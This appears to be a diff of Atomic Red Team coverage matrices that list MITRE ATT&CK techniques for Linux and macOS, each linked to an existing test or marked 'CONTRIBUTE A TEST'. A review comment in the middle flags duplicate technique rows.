| | | XDG Autostart Entries [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Execution Guardrails [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | [Scheduled Task/Job: At](../../T1053.002/T1053.002.md) | | Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Hide Artifacts: Hidden Users [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | SQL Stored Procedures [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Impair Defenses: HISTCONTROL](../../T1562.003/T1562.003.md) | | | | | | | |
| | | [Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md) | | User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | VDSO Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | [Impair Defenses: Disable or Modify Tools](../../T1562.001/T1562.001.md) | | | | | | | |
| | | | | Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Indicator Removal from Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | [Obfuscated Files or Information](../../T1027/T1027.md) | | | | | | | |
| | | | | Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Run Virtual Instance [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Subvert Trust Controls [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | [Masquerading: Rename System Utilities](../../T1036.003/T1036.003.md) | | | | | | | |
| | | | | Spoof Security Alerting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Steganography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | [Subvert Trust Controls: Install Root Certificate](../../T1553.004/T1553.004.md) | | | | | | | |
| | | | | [Obfuscated Files or Information: Compile After Delivery](../../T1027.004/T1027.004.md) | | | | | | | |
| | | | | VBA Stomping [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Hide Artifacts: Hidden Window [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Compile After Delivery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Proc Memory [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Clear Persistence [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Clear Command History [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | HTML Smuggling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Command Obfuscation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Install Root Certificate [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | [Indicator Removal on Host: File Deletion](../../T1070.004/T1070.004.md) | | | | | | | |
| | | | | Hidden Files and Directories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | [Obfuscated Files or Information: Software Packing](../../T1027.002/T1027.002.md) | | | | | | | |
| | | | | Hidden File System [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Space after Filename [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Debugger Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | [Masquerading: Space after Filename](../../T1036.006/T1036.006.md) | | | | | | | |
| | | | | Ptrace System Calls [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | [Hide Artifacts: Hidden Files and Directories](../../T1564.001/T1564.001.md) | | | | | | | |
| | | | | Environmental Keying [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | [Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md) | | | | | | | |
| | | | | Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
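Review bot: the defense-evasion column of this matrix lists the same technique twice, once under an older flat name flagged CONTRIBUTE A TEST and once under its current sub-technique name that already links to a test, so the table overstates the coverage gaps. Compare `Binary Padding [CONTRIBUTE A TEST]` with `[Obfuscated Files or Information: Binary Padding](../../T1027.001/T1027.001.md)`, `File Deletion [CONTRIBUTE A TEST]` with `[Indicator Removal on Host: File Deletion](../../T1070.004/T1070.004.md)`, and `Space after Filename [CONTRIBUTE A TEST]` with `[Masquerading: Space after Filename](../../T1036.006/T1036.006.md)`; the same pairing occurs for Compile After Delivery, Install Root Certificate and Hidden Files and Directories. Suggest keying the rows on technique ID rather than display name (or collapsing each pair to the sub-technique entry that carries the link) before the matrix is rendered, so a reader scanning for missing tests is not sent to contribute a test that already exists.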
-106
View File
@@ -1,106 +0,0 @@
# macOS Atomic Tests by ATT&CK Tactic & Technique
| initial-access | execution | persistence | privilege-escalation | defense-evasion | credential-access | discovery | lateral-movement | collection | exfiltration | command-and-control | impact |
|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|
| External Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Command and Scripting Interpreter: JavaScript [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Socket Filters [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Socket Filters [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Owner/User Discovery](../../T1033/T1033.md) | VNC [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Archive Collected Data: Archive via Utility](../../T1560.001/T1560.001.md) | Exfiltration Over Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Socket Filters [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Structure Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | User Execution: Malicious File [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Malicious Shell Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Plist Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Indicator Removal from Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Modify Authentication Process: Pluggable Authentication Modules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Internet Connection Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Taint Shared Content [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Screen Capture](../../T1113/T1113.md) | Scheduled Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Encoding: Standard Encoding](../../T1132.001/T1132.001.md) | Direct Network Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Spearphishing Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | File System Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Hidden Window [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Input Capture: Keylogging](../../T1056.001/T1056.001.md) | Permission Groups Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | SSH [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Stored Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Spearphishing Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Elevated Execution with Prompt [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Embedded Payloads [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Brute Force: Password Guessing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Device Driver Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Deployment Software [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Input Capture: Keylogging](../../T1056.001/T1056.001.md) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Layer Protocol: DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | External Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Phishing: Spearphishing Attachment [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Command and Scripting Interpreter: AppleScript](../../T1059.002/T1059.002.md) | Plist Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Plist Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | OS Credential Dumping [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Account Discovery: Domain Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | SSH Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Audio Capture](../../T1123/T1123.md) | Automated Exfiltration [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Fronting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | OS Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Native API [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Modify Authentication Process: Pluggable Authentication Modules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Modify Authentication Process: Pluggable Authentication Modules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Steal Web Session Cookie [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Security Software Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Archive via Custom Method [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Symmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Supply Chain Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Source [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | File System Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Abuse Elevation Control Mechanism: Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | HISTCONTROL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Securityd Memory [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Account Discovery: Local Account](../../T1087.001/T1087.001.md) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration to Code Repository [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Fast Flux DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Exploit Public-Facing Application [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Launchctl [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification](../../T1222.002/T1222.002.md) | Brute Force: Password Cracking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md) | Software Deployment Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data from Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol](../../T1048.002/T1048.002.md) | Application Layer Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Stored Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) | AppleScript [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | External Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Sudo Caching [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Email Hiding Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Credentials from Password Stores: Keychain](../../T1555.001/T1555.001.md) | Permission Groups Discovery: Domain Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Staged: Local Data Staging](../../T1074.001/T1074.001.md) | Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Custom Cryptographic Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Service Stop [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Spearphishing Attachment [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Command and Scripting Interpreter [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md) | Rootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Securityd Memory [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | System Service Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Internal Spearphishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Automated Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Exfiltration Over Alternative Protocol](../../T1048/T1048.md) | Remote Access Software [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application or System Exploitation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Trusted Relationship [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scripting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Rc.common [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Startup Items [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Timestomp [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Password Managers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Network Sniffing](../../T1040/T1040.md) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Clipboard Data](../../T1115/T1115.md) | Exfiltration over USB [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Multilayer Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Structure Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Phishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Services: Launchctl](../../T1569.001/T1569.001.md) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Abuse Elevation Control Mechanism: Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | [Network Sniffing](../../T1040/T1040.md) | [Network Share Discovery](../../T1135/T1135.md) | SSH Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Remote Data Staging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data Compressed [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | XPC Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md) | [Boot or Logon Initialization Scripts: Logon Script (Mac)](../../T1037.002/T1037.002.md) | Code Signing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Steal or Forge Kerberos Tickets [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Peripheral Device Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Data from Local System [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration to Text Storage Sites [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Standard Cryptographic Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Reflection Amplification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Compromise Software Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | User Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Startup Items [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Process Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Masquerading: Match Legitimate Name or Location](../../T1036.005/T1036.005.md) | Credentials from Password Stores [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Information Discovery](../../T1082/T1082.md) | | Archive Collected Data: Archive via Library [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Web Service: Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Protocol Tunneling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Launchd [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Create or Modify System Process: Launch Daemon](../../T1543.004/T1543.004.md) | Masquerade File Type [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Unsecured Credentials](../../T1552/T1552.md) | Application Window Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Archive Collected Data [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Transfer Size Limits](../../T1030/T1030.md) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Spearphishing via Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Software Deployment Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Login Item [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) | Hide Artifacts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Bash History [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Time Based Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data Encrypted [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Mail Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Defacement: Internal Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Hardware Additions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Graphical User Interface [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Browser Extensions](../../T1176/T1176.md) | [Event Triggered Execution: Trap](../../T1546.005/T1546.005.md) | [Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md) | Credentials from Web Browsers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Browser Bookmark Discovery](../../T1217/T1217.md) | | Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Communication Through Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Drive-by Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Command and Scripting Interpreter: Bash](../../T1059.004/T1059.004.md) | [Boot or Logon Initialization Scripts: Logon Script (Mac)](../../T1037.002/T1037.002.md) | [Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md) | [Indicator Removal on Host: Clear Linux or Mac System Logs](../../T1070.002/T1070.002.md) | Private Keys [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Network Configuration Discovery](../../T1016/T1016.md) | | Video Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | External Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Account Access Removal](../../T1531/T1531.md) |
| Spearphishing via Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Inter-Process Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Plist Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disabling Security Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Credentials from Password Stores: Credentials from Web Browsers](../../T1555.003/T1555.003.md) | Account Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Email Collection: Email Forwarding Rule [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Encrypted for Impact](../../T1486/T1486.md) |
